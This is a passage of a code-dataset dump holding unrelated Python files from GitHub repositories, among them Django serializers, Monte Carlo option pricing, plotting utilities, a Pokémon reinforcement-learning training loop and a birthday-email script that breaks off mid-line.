np.ndarray:\n \"\"\"Provide mask for the immediate foreground (pixels belonging to egovehicle), for the ring rear left 
camera.\n\n Returns:\n mask: boolean array of shape (H,W)\n \"\"\"\n polygon_verts = np.array(\n [\n [0, 1359],\n [12, 1359],\n [335, 1330],\n [620, 1322],\n [708, 1355],\n [889, 1364],\n [1036, 1376],\n [1161, 1397],\n [1539, 1540],\n [1539, 1549],\n [0, 1549],\n ],\n dtype=float,\n )\n polygon_verts *= 0.5 # rear has half the resolution as ring_front_center.\n mask = raster_utils.get_mask_from_polygons(\n [polygon_verts], img_h=TBV_RING_REAR_LEFT_IMG_HEIGHT, img_w=TBV_RING_REAR_LEFT_IMG_WIDTH\n )\n return mask.astype(bool)\n","repo_name":"johnwlambert/tbv","sub_path":"tbv/utils/z1_egovehicle_mask_utils.py","file_name":"z1_egovehicle_mask_utils.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"9143168749","text":"#importing pandas for reading of csv file\r\nimport pandas as pd\r\nclass Solution:\r\n def __init__(self):\r\n self.data=pd.read_csv(\"C:/Users/DELL/Downloads/book.csv\") # reading csv file\r\n print(self.data)\r\n\r\n def cal_mean(self,cll): # for calculating mean of specific column\r\n D_Mean=self.data[cll].mean()\r\n return D_Mean\r\n\r\n def cal_median(self,cll): # for calculating median of specific column\r\n D_median=self.data[cll].median()\r\n return D_median\r\n\r\n def speci_val(self,val, cl): # for filtering records matching with specific column\r\n return self.data.loc[self.data[cl] ==val] \r\n \r\n def particular_range(self,val, cl): # for filtering records matching with specific column in a range\r\n n=[float(val)-(5/100)*float(val),float(val)+(5/100)*float(val)]\r\n return self.data.loc[self.data[cl] <n[1]] [self.data[cl] >n[0]]\r\n\r\n def change_specific(self, cl): # for calculating change in specific column\r\n self.data[\"new\"]=abs(self.data[cl]-self.cal_mean(cl))\r\n return self.data[\"new\"]\r\n\r\n def average(self): # calculating average\r\n print(\"inside\")\r\n #Average_change=sum(self.data[\"new\"])/len(self.data[\"new\"])\r\n if \"new\" in self.data: # if data change column is availavble then calculate average of change in that column \r\n Average_change= self.cal_mean(\"new\")\r\n return Average_change\r\n else: \r\n return \"no changes detected\"\r\n \r\n def Min(self): # calculating Minimum\r\n if \"new\" in self.data: # if data change column is availavble then calculate Minimum of change in that column\r\n Minimum_change=min(self.data[\"new\"])\r\n return Minimum_change\r\n else: \r\n return \"no changes detected\"\r\n\r\n \r\n def Max(self): # calculating Maximum\r\n if \"new\" in self.data: # if data change column is availavble then calculate Maximum of change in that column\r\n print(\"inside\")\r\n Maximum_change=max(self.data[\"new\"])\r\n return Maximum_change\r\n else: \r\n return \"no changes detected\"\r\n \r\n # def printdata(self):\r\n # print(self.data.head())\r\n\r\nobj = Solution()\r\nflag=True\r\nwhile flag:\r\n print(\"The Following are the features available:\")\r\n print(\"1.Mean of a specific column\\n\" \"2.Median of a specific column\\n\" \"3.Filter all records\\n\" \"4.Filter in Range\\n\" \"5.changes in value\\n\" \"6 av change \\n\" \"7 min change\\n\" \"8 max change\\n\")\r\n a=input(\"enter your options:\")\r\n print(\"You have chosen :\" +a)\r\n a = int(a)\r\n# choosing specific values and then comparing\r\n if a == 1: #case 1 -> calculating mean for specific column\r\n x=input(\"Enter specific column :\")\r\n print(\"Mean: \", obj.cal_mean(x))\r\n \r\n elif a==2: #case 2 -> calculating median for specific column\r\n 
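# Illustrative sketch on `particular_range` above, with hypothetical data:
# combining both bounds into one boolean mask avoids the chained lookup
# `df.loc[mask1][mask2]`, which pandas flags with a UserWarning.
import pandas as pd
df = pd.DataFrame({"price": [90.0, 96.0, 100.0, 104.0, 111.0]})  # hypothetical data
val = 100.0
lo, hi = val * 0.95, val * 1.05                    # the same +/-5% window
in_range = df.loc[(df["price"] > lo) & (df["price"] < hi)]
print(in_range)                                    # keeps 96.0, 100.0, 104.0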
x=input(\"Enter specific column :\")\r\n # obj.cal_median(x)\r\n print(\"Mean: \", obj.cal_median(x))\r\n \r\n elif a==3: #case 3 -> filtering particular value by column and its name \r\n x=input(\"Enter specific value :\")\r\n cl = input(\"Enter specific column:\")\r\n print(\"Speci value\\n\", obj.speci_val(int(x), cl))\r\n\r\n elif a==4: #case 4 -> filtering particular value by column and its name in a range\r\n cl=input(\"Enter specific column :\")\r\n val=input(\"Enter specific value :\")\r\n print(\"Range\\n\", obj.particular_range(int(val), cl))\r\n\r\n elif a==5: #case 5-> calculating changes in value by specific column\r\n x=input(\"Enter specific column :\")\r\n print(\"change\\n\", obj.change_specific(x))\r\n # print(obj.printdata())\r\n a = input(\" Calculate Further !!!! \\n 6 Average change: \\n 7 MIN change: \\n 8 MAX change: \\n\")\r\n a = int(a)\r\n\r\n if a == 6: # changes values present then calculating average ,minimum and maximum\r\n print(\"Average: \", obj.average()) \r\n\r\n elif a==7:\r\n print(\"MIN change: \", obj.Min())\r\n\r\n elif a==8:\r\n print(\"MAX change: \", obj.Max())\r\n\r\n else:\r\n print(\"There is no such value\")\r\n\r\n op=input(\"Do you want to continue further? \\n 1. continue \\n 2. exit \\n\")\r\n if op==\"1\":\r\n flag=True\r\n else:\r\n flag=False\r\n","repo_name":"Hirendra12784/utitlity","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12572698239","text":"from rest_framework import serializers\nfrom .models import Spectator, Task, Actor, User, Director, Game, User\n\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.validators import UnicodeUsernameValidator\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n # fiels gibt die eigenschaft an die seriasiert werden müssen\n fields = ['id', 'username', 'is_staff', 'groups']\n extra_kwargs = {\n 'username': {\n 'validators': [UnicodeUsernameValidator()],\n }\n }\n\n\nclass DirectorSerializer(serializers.ModelSerializer):\n # userserializser wird für das User feld benötigt\n user = UserSerializer(many=False)\n class Meta:\n model = Director\n fields = ['id', 'user']\n\n \n\nclass GameSerializer(serializers.ModelSerializer):\n director = DirectorSerializer(many=False)\n class Meta:\n model = Game\n fields = ['id', 'name', 'duration', 'director', 'status']\n \n #Create-Methode überschrieben bei Create Aufruf von Game\n def create(self, validated_data):\n director_data = validated_data.pop('director')\n user_data = director_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n director = Director.objects.get(user=user)\n duration = validated_data.pop('duration')\n gamename = validated_data.pop('name')\n game = Game.objects.create(director=director, duration=duration, name=gamename)\n game.save()\n return game\n\n\nclass SpectatorSerializer(serializers.ModelSerializer):\n user = UserSerializer(many=False)\n game = GameSerializer(many=False)\n class Meta:\n model = Spectator\n fields = ['id', 'user', 'game']\n\n\nclass ActorSerializer(serializers.ModelSerializer):\n user = UserSerializer(many=False)\n game = GameSerializer(many=False)\n class Meta:\n model = Actor\n fields = ['id', 'user', 'game']\n\n # Update-Methode überschrieben wenn Actor das Game gesetzt bekommt\n def update(self, instance, validated_data):\n user_data = 
validated_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n actor = Actor.objects.get(user=user)\n\n game_data = validated_data.pop('game')\n name = game_data.pop('name')\n game = Game.objects.get(name=name)\n\n\n actor.game = game\n actor.save()\n return actor\n\nclass TaskSerializer(serializers.ModelSerializer):\n #Da Objekte von anderen Models übergeben werden,\n #benötigt der TaskSerializer auch den Game-, User-\n #und ActorSerializer\n game = GameSerializer(many=False)\n writer = UserSerializer(many=False)\n actors = ActorSerializer(many=True, required=False)\n\n #Meta legt fest welche Felder mit im JSON mitgesendet werden\n class Meta:\n model = Task\n fields = ['id', 'text', 'status', 'game', 'writer', 'actors']\n #Create Methode wird überschrieben, da der Standardserializer\n #keine M:N Beziehung serializiert\n def create(self, validated_data):\n #aus dem JSON werden die einzelnen Eigenschaften geholt\n text = validated_data.pop('text')\n status = validated_data.pop('status')\n game_data = validated_data.pop('game')\n gamename = game_data.pop('name')\n #anhand der gamedaten wird das game objekt geholt\n game = Game.objects.get(name=gamename)\n\n writer_data = validated_data.pop('writer')\n username = writer_data.pop('username')\n #anhand der Writer wird der Uer geholt\n writer = User.objects.get(username=username)\n\n\n actors_data = validated_data.pop('actors')\n\n #mit den bisher serialisierten Daten wird die Aufgabe estellt.\n task = Task.objects.create(text=text, status=status, writer=writer, game=game)\n #da mehrere Actors bei einer Task eingetragen sein können\n #wird über die Actors_data interriert und jder Actor der Task hinzugefügt\n for actor_data in actors_data:\n user_data = actor_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n actor = Actor.objects.get(user=user)\n task.actors.add(actor)\n #Das Objekt wird gespeichert, erst dann bekommt die Task eine ID\n task.save()\n #und zurückgesendet\n return task\n\n # Update-Methode überschrieben wenn Task umgedatet wird\n def update(self, instance, validated_data):\n instance.text = validated_data.pop('text')\n instance.status = validated_data.pop('status')\n game_data = validated_data.pop('game')\n gamename = game_data.pop('name')\n game = Game.objects.get(name=gamename)\n instance.game=game\n\n writer_data = validated_data.pop('writer')\n username = writer_data.pop('username')\n writer = User.objects.get(username=username)\n instance.writer=writer\n actors_data = validated_data.pop('actors')\n for actor_data in actors_data:\n user_data = actor_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n actor = Actor.objects.get(user=user)\n instance.actors.add(actor)\n\n instance.save()\n return instance\n\n","repo_name":"hennabanana/ImproApp","sub_path":"improproject/backend/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30980594084","text":"import random\nfrom math import exp\nfrom finance import *\nfrom matrix import *\n\n\n\n\n\n\n\n\ndef monte_carlo(option:Option, number_of_trials:int = 16):\n \"\"\"\n Estimates the value of a european barrier-less option\n :param option: the option\n :param number_of_trials: number of randomly generated asset paths to take\n :return: a tuple, containing the estimated value and 95% 
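# Illustrative sketch of the nested-create pattern used in the serializer
# record above: DRF does not create nested writable fields automatically, so
# create()/update() pop each nested dict and resolve it to a model instance
# before saving. In miniature (hypothetical serializer method):
#
#     def create(self, validated_data):
#         user_data = validated_data.pop('user')
#         user = User.objects.get(username=user_data['username'])
#         return Game.objects.create(user=user, **validated_data)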
confidence interval\n \"\"\"\n\n estimated_values = []\n for i in range(number_of_trials):\n ep = random.normalvariate(0,1)\n Si = option.spot_price*exp((option.interest_rate-0.5*option.volatility**2)*option.time_until_expiry +\n ep*option.volatility*(option.time_until_expiry**0.5))\n Vi = option.payoff(Si)\n estimated_values.append(exp(-1*option.interest_rate*option.time_until_expiry)*Vi)\n am = sum(estimated_values)/number_of_trials\n b2m = (1/(number_of_trials-1)) * sum([(Vi - am)**2 for Vi in estimated_values])\n bm = b2m**0.5\n return am, (am - 1.96*bm*(number_of_trials**-0.5),am + 1.96*bm*(number_of_trials**-0.5))\n\n\ndef monte_carlo_barrier(option: Option, number_of_trials: int = 16, number_of_steps_per_path: int = 16):\n \"\"\"\n Estimates the value of a european barrier option\n :param option: the option\n :param number_of_trials: number of randomly generated asset paths to take\n :param number_of_steps_per_path: the number of steps per path\n :return: a tuple, containing the estimated value and 95% confidence interval\n \"\"\"\n estimated_values = []\n dt = option.time_until_expiry/number_of_steps_per_path\n lower_barrier = option.lower_barrier\n upper_barrier = option.upper_barrier\n for i in range(number_of_trials):\n path = [option.spot_price]\n valid_path = True\n for step in range(number_of_steps_per_path):\n ep = random.normalvariate(0,1)\n Si = path[-1]*exp((option.interest_rate-0.5*option.volatility**2)*dt + ep*option.volatility*(dt**0.5))\n if (lower_barrier is not None and Si < lower_barrier) or (upper_barrier is not None and Si > upper_barrier):\n valid_path = False\n break#this path is ignored as it passes though a barrier\n path.append(Si)\n if valid_path:\n Vi = option.payoff(path[-1])\n estimated_values.append(exp(-1*option.interest_rate*option.time_until_expiry)*Vi)\n else:\n estimated_values.append(0)\n am = sum(estimated_values)/number_of_trials\n b2m = (1/(number_of_trials-1)) * sum([(Vi - am)**2 for Vi in estimated_values])\n bm = b2m**0.5\n return am, (am - 1.96*bm*(number_of_trials**-0.5),am + 1.96*bm*(number_of_trials**-0.5))\n\n\n\n\n\n\"\"\"\ndef arithmetic_avg(x):\n return sum(x)/len(x)\n\ndef geometric_avg(x):\n log_list = [log(i) for i in x]\n return exp(arithmetic_avg(log_list))\n\n\ndef monte_carlo_asian(T,sigma,r,S,E,payoff,averaging_function=geometric_avg,number_of_trials = 16,number_of_steps_per_path=16):\n estimated_values = []\n dt = T/number_of_steps_per_path\n for i in range(number_of_trials):\n path = [S]\n for step in range(number_of_steps_per_path):\n ep = random.normalvariate(0,1)\n Si = path[-1]*exp((r-0.5*sigma**2)*dt + ep*sigma*(dt**0.5))\n path.append(Si)\n avg = averaging_function(path)\n Vi = payoff(path[-1],avg,E)\n estimated_values.append(exp(-1*r*T)*Vi)\n am = sum(estimated_values)/number_of_trials\n b2m = (1/(number_of_trials-1)) * sum([(Vi - am)**2 for Vi in estimated_values])\n bm = b2m**0.5\n return am, (am - 1.96*bm*(number_of_trials**-0.5),am + 1.96*bm*(number_of_trials**-0.5))\n\n\ndef monte_carlo_american(T,sigma,r,q,S,E,payoff,number_of_paths = 16,number_of_steps_per_path=16):\n dt = T/number_of_steps_per_path\n estimated_values = []\n e = [exp(-1*r*dt*i) for i in range(number_of_steps_per_path+1)]\n\n\n for i in range(number_of_paths):\n path = [S]\n for step in range(number_of_steps_per_path):\n ep = random.normalvariate(0,1)\n dX = random.normalvariate(0,dt)\n Si = path[-1]*exp((r - 0.5 * sigma ** 2) * dt + ep * sigma * (dt ** 0.5))#path[-1]*(1 + (r*dt + sigma*dX))# #exp((r - 0.5 * sigma ** 2) * dt + ep * sigma * (dt 
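# Illustrative sketch, hypothetical parameters: the per-step update used
# throughout this file is the exact GBM solution
#   S_{t+dt} = S_t * exp((r - 0.5*sigma^2)*dt + sigma*sqrt(dt)*eps).
# For a vanilla call the trial loop in monte_carlo() can be vectorised; the
# 95% interval below matches the 1.96*bm/sqrt(M) half-width computed above:
import numpy as np
S0, K, r, sigma, T, M = 10.0, 9.0, 0.06, 0.1, 1.0, 100_000
eps = np.random.standard_normal(M)
ST = S0 * np.exp((r - 0.5 * sigma**2) * T + sigma * np.sqrt(T) * eps)
V = np.exp(-r * T) * np.maximum(ST - K, 0.0)       # discounted call payoff
mean, half = V.mean(), 1.96 * V.std(ddof=1) / np.sqrt(M)
print(mean, (mean - half, mean + half))            # estimate and 95% CI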
** 0.5))\n path.append(Si)\n\n option_values = [e[i]*payoff(path[i],E) for i in range(number_of_steps_per_path+1)]\n print(path,\"\\n\",option_values,max(option_values))\n estimated_values.append(max(option_values))\n return sum(estimated_values)/len(estimated_values)\n\n\n\n\ndef plot():\n import matplotlib.pyplot as plt\n S = 10\n E = 9\n sigma = 0.1\n r = 0.06\n T = 1\n q = 0\n sol = call_exact_value(S, E, 0, T, sigma, r)\n values = []\n lower_c_i = []\n upper_c_i = []\n space = range(3, 15)\n for i in space:\n val, conv_int = monte_carlo(T, sigma, r, q, S, E, lambda x:max(x-E,0), number_of_trials=2 ** i)\n values.append(val)\n lower_c_i.append(conv_int[0])\n upper_c_i.append(conv_int[1])\n plt.fill_between(space, lower_c_i, upper_c_i, alpha=0.2, label=\"95% confidence interval\", color='tab:orange')\n plt.plot(space, values, label=\"Estimated value\", color='orange')\n plt.plot(space, [sol for x in space], linestyle='dashed', label=\"True solution\")\n plt.xlabel('Amount of random paths taken')\n plt.ylabel('Estimated Value')\n plt.legend(loc='upper right')\n labels = [2 ** i for i in space]\n plt.xticks(space, labels)\n plt.show()\n\n\ndef multivariable_monte_carlo(S_values,sigmas,rho_matrix: Matrix,r,T,payoff,number_of_trials = 16):\n estimated_option_values = []\n M = rho_matrix.get_chomsky_decomp()\n for i in range(number_of_trials):\n ep_values = []\n end_S_values = []\n for i in range(len(S_values)):\n\n ep = random.normalvariate(0, 1)\n ep_values.append(ep)\n\n corrilated_ep_values = []\n ep_vector = Matrix(ep_values)\n ep_vector.transpose()\n\n corrilated_ep_values_vector = M*ep_vector\n for i in range(len(S_values)):\n S_val = S_values[i]*exp((r-0.5*sigmas[i]**2)*T + corrilated_ep_values_vector[i]*sigmas[i]*(T**0.5))\n end_S_values.append(S_val)\n\n estimated_option_values.append(payoff(end_S_values))\n\n return exp(-1*r * T) * sum(estimated_option_values)/len(estimated_option_values)\n\"\"\"\n\n\n","repo_name":"JamesWood97/James-Wood-Option-valuation","sub_path":"montecarlo.py","file_name":"montecarlo.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12657847436","text":"n=int(input())\nA=list(map(int,input().split()))\nmi=max(A)\nans=0\nfor i in range(n):\n for j in list(range(n))[i:]:\n if i==j:\n mi=A[i]\n mi=min(mi,A[j])\n ans=max(ans,mi*(j-i+1))\nprint(ans)","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc189/abc189_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7428888241","text":"## Some Based on utils file in Innvestigate lib. 
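# Illustrative sketch on the short contest snippet just above (maximise
# min(window) * window_length over all windows): the O(n^2) double loop is
# the classic "largest rectangle in a histogram" problem, solvable in O(n)
# with a monotonic stack. Hypothetical standalone function, not the
# submitted solution:
def largest_rectangle(heights):
    stack, best = [], 0                      # stack: (start_index, height), heights increasing
    for i, h in enumerate(heights + [0]):    # trailing 0 flushes the stack at the end
        start = i
        while stack and stack[-1][1] >= h:
            idx, height = stack.pop()
            best = max(best, height * (i - idx))
            start = idx                      # a lower bar extends back to where that one began
        stack.append((start, h))
    return best
assert largest_rectangle([2, 1, 4, 5, 3]) == 9   # min(4, 5, 3) * 3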
I just modified it as per my use.\n## Credits to them.\n\nfrom __future__ import\\\n absolute_import, print_function, division, unicode_literals\nfrom future.utils import raise_with_traceback, raise_from\n# catch exception with: except Exception as e\nfrom builtins import range, map, zip, filter\nfrom io import open\nimport six\n# End: Python 2/3 compatability header small\n\nimport sys\nif sys.platform == \"darwin\":\n import matplotlib\n matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap\nfrom PIL import Image\n\nimport numpy as np\nimport os\nimport PIL.Image\nimport shutil\nimport ipdb\nimport time\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Input, Flatten, Conv2D\n\n\ndef mkdir_p(mypath):\n\n '''Creates a directory. equivalent to using mkdir -p on the command line'''\n\n from errno import EEXIST\n from os import makedirs, path\n\n try:\n makedirs(mypath)\n except OSError as exc: # Python >2.5\n if exc.errno == EEXIST and path.isdir(mypath):\n pass\n else:\n raise\n\n return mypath\n\ndef plot_image_grid(grid, folderName,\n row_labels_left,\n row_labels_right,\n col_labels,\n file_name=None,\n dpi=227,\n ):\n ## Assuming there is only going to be one row (and many coloumns) in the grid\n\n plt.rcParams.update({'font.size': 5})\n plt.rc(\"font\", family=\"sans-serif\")\n plt.rc(\"axes.spines\", top=True, right=True, left=True, bottom=True)\n # print('Plotting the figure')\n image_size = (grid[0][0]).shape[0]\n\n nRows = len(grid)\n nCols = len(grid[0])\n\n # ipdb.set_trace()\n if image_size > 5:\n tRows = nRows + 3 # total rows\n grid.append(grid[0])\n row_labels_left.append(row_labels_left[0])\n row_labels_right.append(row_labels_right[0])\n else:\n tRows = nRows + 2 # total rows\n tCols = nCols + 2 # total cols\n\n wFig = tCols # Figure width (two more than nCols because I want to add ylabels on the very left and very right of figure)\n hFig = tRows # Figure height (one more than nRows becasue I want to add xlabels to the top of figure)\n\n fig, axes = plt.subplots(nrows=tRows, ncols=tCols, figsize=(wFig, hFig))\n fig.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)\n axes = np.reshape(axes, (tRows, tCols))\n\n scale = 0.75\n\n for r in range(tRows):\n # if r <= 1:\n for c in range(tCols):\n ax = axes[r][c]\n\n l, b, w, h = ax.get_position().bounds\n\n ax.set_position([l, b, w * scale, h * scale])\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.set_xticks([])\n ax.set_yticks([])\n\n if r > 0 and c > 0 and r < tRows - 1 and c < tCols - 1:\n # ipdb.set_trace()\n img_data = grid[r - 1][c - 1]\n abs_mn = round(np.amin(img_data), 3)\n abs_mx = round(np.amax(img_data), 3)\n\n if image_size > 5:\n if r == tRows-2:\n centre = image_size//2\n diff = 2\n img_data = img_data[centre-diff:centre+diff+1, centre-diff:centre+diff+1]\n\n if c == 1:\n cMap = 'gray'\n # print('Min val is: ', abs_mn)\n # cen = img_data.shape[0]//2\n # print('Centre pixel value is: ', (img_data[cen, cen]*255).astype('int'))\n im = ax.imshow(img_data, interpolation='none', cmap=cMap, vmin=abs_mn, vmax=abs_mx)\n else:\n uP = cm.get_cmap('Reds', 128)\n dowN = cm.get_cmap('Blues_r', 128)\n newcolors = np.vstack((\n dowN(np.linspace(0, 1, 127)),\n uP(np.linspace(0, 1, 128))\n ))\n cMap = ListedColormap(newcolors, name='RedBlues')\n abs_mx = max(abs(abs_mn), abs(abs_mx))\n im = 
ax.imshow(img_data, interpolation='none', cmap=cMap, vmin=-abs_mx, vmax=abs_mx)\n\n zero = 0\n if not r - 1:\n\n if col_labels != []:\n ax.set_title(col_labels[c - 1] + '\\nmax' + str(abs_mx) + '\\nmin' + str(abs_mn),\n rotation=45,\n horizontalalignment='left',\n verticalalignment='bottom')\n\n if c == tCols - 2:\n\n if row_labels_right != []:\n txt_right = [l + '\\n' for l in row_labels_right[r - 1]]\n ax2 = ax.twinx()\n # ax2.axis('off')\n\n ax2.set_xticks([])\n ax2.set_yticks([])\n ax2.spines['top'].set_visible(False)\n ax2.spines['right'].set_visible(False)\n ax2.spines['bottom'].set_visible(False)\n ax2.spines['left'].set_visible(False)\n ax2.set_ylabel(''.join(txt_right), rotation=0,\n verticalalignment='center',\n horizontalalignment='left', )\n\n if not c - 1:\n\n if row_labels_left != []:\n txt_left = [l + '\\n' for l in row_labels_left[r - 1]]\n ax.set_ylabel(''.join(txt_left),\n rotation=0,\n verticalalignment='center',\n horizontalalignment='right', )\n\n # else:\n if c != 1:\n w_cbar = 0.005\n h_cbar = h * scale\n b_cbar = b\n l_cbar = l + scale * w + 0.001\n cbaxes = fig.add_axes([l_cbar, b_cbar, w_cbar, h_cbar])\n cbar = fig.colorbar(im, cax=cbaxes)\n cbar.outline.set_visible(False)\n cbar.ax.tick_params(labelsize=4, width=0.3, length=1.5)\n cbar.set_ticks([-abs_mx, zero, abs_mx])\n cbar.set_ticklabels([-abs_mx, zero, abs_mx])\n #####################################################################################\n\n dir_path = folderName\n print('Saving figure to {}'.format(dir_path + file_name))\n\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n plt.savefig((dir_path + '/' + file_name), orientation='landscape', dpi=dpi / scale, transparent=True, frameon=False)\n plt.close(fig)\n\n\ndef preprocess_model_for_lime(model, input_shape=(227, 227, 3)):\n input = Input(shape=input_shape, name='image_input')\n x = Conv2D(1, kernel_size=(1, 1),\n input_shape=input_shape,\n kernel_initializer=keras.initializers.Constant(value=1 / 3),\n )(input)\n x = Flatten()(x)\n x = model(x)\n\n newModel = Model(inputs=input, outputs=x)\n\n return newModel\n\n## This is extra function. 
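# Illustrative sketch on the diverging colormap above (assumes
# matplotlib >= 3.2 and nonzero data, else TwoSlopeNorm raises ValueError):
# centring on zero can also be done with a norm instead of symmetric
# vmin/vmax, using a stock diverging map rather than the stitched one:
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import TwoSlopeNorm
data = np.random.randn(8, 8)                     # hypothetical signed heatmap
mx = float(np.abs(data).max())
plt.imshow(data, cmap='RdBu_r', norm=TwoSlopeNorm(vmin=-mx, vcenter=0.0, vmax=mx))
plt.colorbar()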
Not being used anywhere.\n## It is there just for future reference\ndef save_lime_mask(mask, output_dir):\n output_dir = output_dir + 'lime_results/'\n r_str = time.strftime(\"%Y_%m_%d-%H:%M:%S\")\n print('Saving extra LIME results to: ', output_dir)\n mkdir_p(output_dir)\n mask = Image.fromarray(np.uint8(mask*255))\n mask.save(output_dir + 'lime_mask_' + r_str + '.png')\n\n","repo_name":"bnaman50/center-pixel-model","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32591185964","text":"from typing import Optional\n\nfrom poke_env.player_configuration import PlayerConfiguration\nfrom torch import nn\n\nfrom champion_league.agent.ppo import PPOAgent\nfrom champion_league.config.load_configs import save_args\nfrom champion_league.env import LeaguePlayer\nfrom champion_league.env import RLPlayer\nfrom champion_league.matchmaking.league_skill_tracker import LeagueSkillTracker\nfrom champion_league.matchmaking.matchmaker import MatchMaker\nfrom champion_league.preprocessor import Preprocessor\nfrom champion_league.reward.reward_scheme import RewardScheme\nfrom champion_league.teams.team_builder import AgentTeamBuilder\nfrom champion_league.training.league.league_args import LeagueArgs\nfrom champion_league.training.league.league_epoch import league_epoch\nfrom champion_league.training.league.utils import beating_league\nfrom champion_league.training.league.utils import move_to_league\nfrom champion_league.utils.directory_utils import PokePath\nfrom champion_league.utils.server_configuration import DockerServerConfiguration\nfrom champion_league.utils.step_counter import StepCounter\n\n\ndef league_play(\n preprocessor: Preprocessor,\n network: nn.Module,\n league_path: PokePath,\n args: LeagueArgs,\n epoch: Optional[int] = 0,\n):\n \"\"\"Main loop for training a league agent.\n\n Args:\n league_path: Path to the league directory\n preprocessor: The preprocessor that this agent will be using to convert Battle objects to tensors.\n network: The network that will be training.\n args: Hyperparameters used for training.\n epoch: If we're resuming, this is the epoch we're resuming from.\n \"\"\"\n agent = PPOAgent(\n league_path=league_path, tag=args.tag, resume=True, **args.agent_args\n )\n\n step_counter = StepCounter()\n skill_tracker = LeagueSkillTracker(league_path, args.resume)\n matchmaker = MatchMaker(\n args.probs[\"self_play_prob\"], args.probs[\"league_play_prob\"], league_path\n )\n team_builder = AgentTeamBuilder(\n agent_path=league_path.agent, battle_format=args.battle_format\n )\n\n team_builder.save_team()\n player = RLPlayer(\n battle_format=args.battle_format,\n preprocessor=preprocessor,\n reward_scheme=RewardScheme(args.rewards),\n server_configuration=DockerServerConfiguration,\n team=team_builder,\n player_configuration=PlayerConfiguration(\n username=f\"rltrainer\", password=\"rltrainer1234\"\n ),\n )\n\n opponent = LeaguePlayer(\n device=agent.device,\n network=agent.network,\n preprocessor=preprocessor,\n sample_moves=args.sample_moves,\n max_concurrent_battles=10,\n server_configuration=DockerServerConfiguration,\n team=AgentTeamBuilder(),\n training_team=team_builder,\n battle_format=args.battle_format,\n player_configuration=PlayerConfiguration(\n username=f\"rlopponent\", password=\"rlopponent1234\"\n ),\n )\n\n for e in range(epoch, epoch + args.nb_steps // args.epoch_len):\n agent.save_model(e, network, preprocessor, 
team_builder)\n save_args(agent_dir=league_path.agent, args=args.dict_args, epoch=e)\n team_builder.save_team()\n\n player.play_against(\n env_algorithm=league_epoch,\n opponent=opponent,\n env_algorithm_kwargs={\n \"agent\": agent,\n \"opponent\": opponent,\n \"matchmaker\": matchmaker,\n \"skill_tracker\": skill_tracker,\n \"epoch_len\": args.epoch_len,\n \"step_counter\": step_counter,\n \"epoch\": e,\n },\n )\n skill_tracker.save_skill_ratings(e)\n\n if beating_league(agent):\n move_to_league(\n agent_path=league_path.agent,\n league_dir=league_path.league,\n tag=agent.tag,\n epoch=e,\n )\n break\n","repo_name":"alex-nooj/champion_league","sub_path":"champion_league/training/league/league_play.py","file_name":"league_play.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74789833127","text":"from itertools import combinations\n\nn, m = map(int, input().split())\nice = list(combinations(range(1, n+1), 3))\n\n# n x n의 2차원 배열 -> 맛 없는 아이스크림 조합 체크\nno_mat = [[0] * (n+1) for _ in range(n+1)]\n\nfor _ in range(m):\n x, y = map(int, input().split())\n no_mat[x][y] = 1\n no_mat[y][x] = 1\n\nans = 0\nfor x in ice:\n # 하나라도 체크되어 있으면\n if no_mat[x[0]][x[1]] or no_mat[x[0]][x[2]] or no_mat[x[1]][x[2]]:\n continue\n ans += 1\n\nprint(ans)","repo_name":"deltaori0/Python-Algorithm","sub_path":"baekjoon/순열과 조합/2422.py","file_name":"2422.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10525718524","text":"import pandas as pd\nimport random\nimport datetime as dt\nimport smtplib\n\ndata = pd.read_csv(\"birthdays.csv\")\nnames = data[\"name\"]\nemails = data[\"email\"]\ndates = data[\"day\"]\nmonths = data[\"month\"]\nyears = data[\"year\"]\n\nwith open(\"quotes.txt\") as file:\n quotes = file.readlines()\n quote = random.choice(quotes)\n\ndef send_wishes(to, message):\n connection = smtplib.SMTP(\"smtp.gmail.com\")\n # connection.ehlo()\n connection.starttls()\n connection.login(\"<your email here>\", \"<your password here>\")\n connection.sendmail(\"<your email here>\", to, f\"Subject: Happy Birthday!!\\n\\n{message}\\nAnd here's quote for you as a gift:\\n{quote}\")\n connection.close()\n\ndef select_random_letter():\n letter_num = random.randint(1, 3)\n with open(f\".\\letter_templates\\letter_{letter_num}.txt\") as file:\n letter = file.read()\n\n return letter\n\ndef check_birthday():\n for name, email, date, month, year in 